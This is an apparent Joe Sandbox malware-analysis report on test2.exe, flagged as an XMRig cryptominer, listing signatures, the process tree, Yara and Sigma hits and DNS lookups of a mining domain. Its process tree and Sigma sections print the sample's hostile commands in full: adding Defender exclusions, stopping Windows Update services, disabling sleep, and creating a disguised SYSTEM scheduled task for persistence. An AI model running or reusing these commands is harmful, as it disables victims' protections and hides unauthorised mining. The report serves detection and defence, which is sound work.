Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test2.exe

Overview

General Information

Sample name:test2.exe
Analysis ID:1491606
MD5:80b97cc01243be6495f5df52bcdd6bdf
SHA1:5fe219bfdf8d6825130dcb5414bf05cc56899af5
SHA256:3e178f8b58d7c27ad58180fa75f779e2cf3b141ee3839f17bad52d17fb0642db
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • test2.exe (PID: 6296 cmdline: "C:\Users\user\Desktop\test2.exe" MD5: 80B97CC01243BE6495F5DF52BCDD6BDF)
    • dialer.exe (PID: 1444 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 888 cmdline: winlogon.exe MD5: A987B43E6A8E8F894B98A3DF022DB518)
      • lsass.exe (PID: 952 cmdline: C:\Windows\system32\lsass.exe MD5: 15A556DEF233F112D127025AB51AC2D3)
      • svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: F586835082F632DC8D9404D83BC16316)
      • dwm.exe (PID: 1192 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 1264 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1304 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: F586835082F632DC8D9404D83BC16316)
      • IntelCpHDCPSvc.exe (PID: 1464 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe MD5: B6BAD2BD8596D9101874E9042B8E2D63)
      • svchost.exe (PID: 1472 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1644 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: F586835082F632DC8D9404D83BC16316)
      • svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: F586835082F632DC8D9404D83BC16316)
      • IntelCpHeciSvc.exe (PID: 1760 cmdline: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe MD5: 3B0DF35583675DE5A08E8D4C1271CEC0)
      • igfxCUIService.exe (PID: 1796 cmdline: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe MD5: 91038D45A86B5465E8B7E5CD63187150)
      • svchost.exe (PID: 1856 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: F586835082F632DC8D9404D83BC16316)
  • powershell.exe (PID: 2904 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 7468 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5424 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4700 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2728 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8012 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 3128 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 6828 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 832 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 920 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2596 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 3188 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7772 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • updater.exe (PID: 5708 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 80B97CC01243BE6495F5DF52BCDD6BDF)
    • dialer.exe (PID: 5060 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • powershell.exe (PID: 5080 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • powershell.exe (PID: 4756 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cmd.exe (PID: 832 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3188 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 2200 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6984 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 6880 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 4752 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cmd.exe (PID: 5936 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 2404 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 6892 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\kkldhmzqxige.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Windows\Temp\kkldhmzqxige.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
    • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
    • 0x4d1fc8:$s3: \\.\WinRing0_
    • 0x4ca4c8:$s4: pool_wallet
    • 0x4c62d0:$s5: cryptonight
    • 0x4c62e0:$s5: cryptonight
    • 0x4c62f0:$s5: cryptonight
    • 0x4c6300:$s5: cryptonight
    • 0x4c6318:$s5: cryptonight
    • 0x4c6328:$s5: cryptonight
    • 0x4c6338:$s5: cryptonight
    • 0x4c6350:$s5: cryptonight
    • 0x4c6360:$s5: cryptonight
    • 0x4c6378:$s5: cryptonight
    • 0x4c6390:$s5: cryptonight
    • 0x4c63a0:$s5: cryptonight
    • 0x4c63b0:$s5: cryptonight
    • 0x4c63c0:$s5: cryptonight
    • 0x4c63d8:$s5: cryptonight
    • 0x4c63f0:$s5: cryptonight
    • 0x4c6400:$s5: cryptonight
    • 0x4c6410:$s5: cryptonight
    C:\Windows\Temp\kkldhmzqxige.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
    • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
    C:\Windows\Temp\kkldhmzqxige.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x4cb268:$a1: mining.set_target
    • 0x4c6a48:$a2: XMRIG_HOSTNAME
    • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
    • 0x4c6a20:$a4: XMRIG_VERSION

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x5153a8:$a1: mining.set_target
      • 0x510b88:$a2: XMRIG_HOSTNAME
      • 0x512680:$a3: Usage: xmrig [OPTIONS]
      • 0x510b60:$a4: XMRIG_VERSION

      Sigma Signatures

      Operating System Destruction

      barindex
      Sigma detected: Stop multiple services
      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7468, ProcessName: cmd.exe

      System Summary

      barindex
      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 7772, ProcessName: powershell.exe
      Sigma detected: Invoke-Obfuscation VAR+ Launcher
      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 7772, ProcessName: powershell.exe
      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2904, ProcessName: powershell.exe
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2904, ProcessName: powershell.exe
      Sigma detected: Uncommon Svchost Parent Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 1444, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 1120, ProcessName: svchost.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4992, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 2904, ProcessName: powershell.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: test2.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpAvira: detection malicious, Label: HEUR/AGEN.1362795
      Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1329646
      Multi AV Scanner detection for domain / URL
      Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 10%Perma Link
      Source: http://pesterbdd.com/images/Pester.pngXzVirustotal: Detection: 8%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Program Files\Google\Chrome\updater.exeVirustotal: Detection: 54%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpReversingLabs: Detection: 86%
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpVirustotal: Detection: 82%Perma Link
      Source: C:\Windows\Temp\kkldhmzqxige.tmpReversingLabs: Detection: 75%
      Source: C:\Windows\Temp\kkldhmzqxige.tmpVirustotal: Detection: 76%Perma Link
      Multi AV Scanner detection for submitted file
      Source: test2.exeVirustotal: Detection: 54%Perma Link
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpJoe Sandbox ML: detected
      Source: C:\Windows\Temp\kkldhmzqxige.tmpJoe Sandbox ML: detected
      Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: test2.exeJoe Sandbox ML: detected

      Bitcoin Miner

      barindex
      Yara detected Xmrig cryptocurrency miner
      Source: Yara matchFile source: 0000001E.00000002.4636789833.00007FF62DCDC000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Windows\Temp\kkldhmzqxige.tmp, type: DROPPED
      Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
      Source: test2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: unknownDNS traffic detected: query: xmr.test.lol replaycode: Name error (3)
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: global trafficDNS traffic detected: DNS query: xmr.test.lol
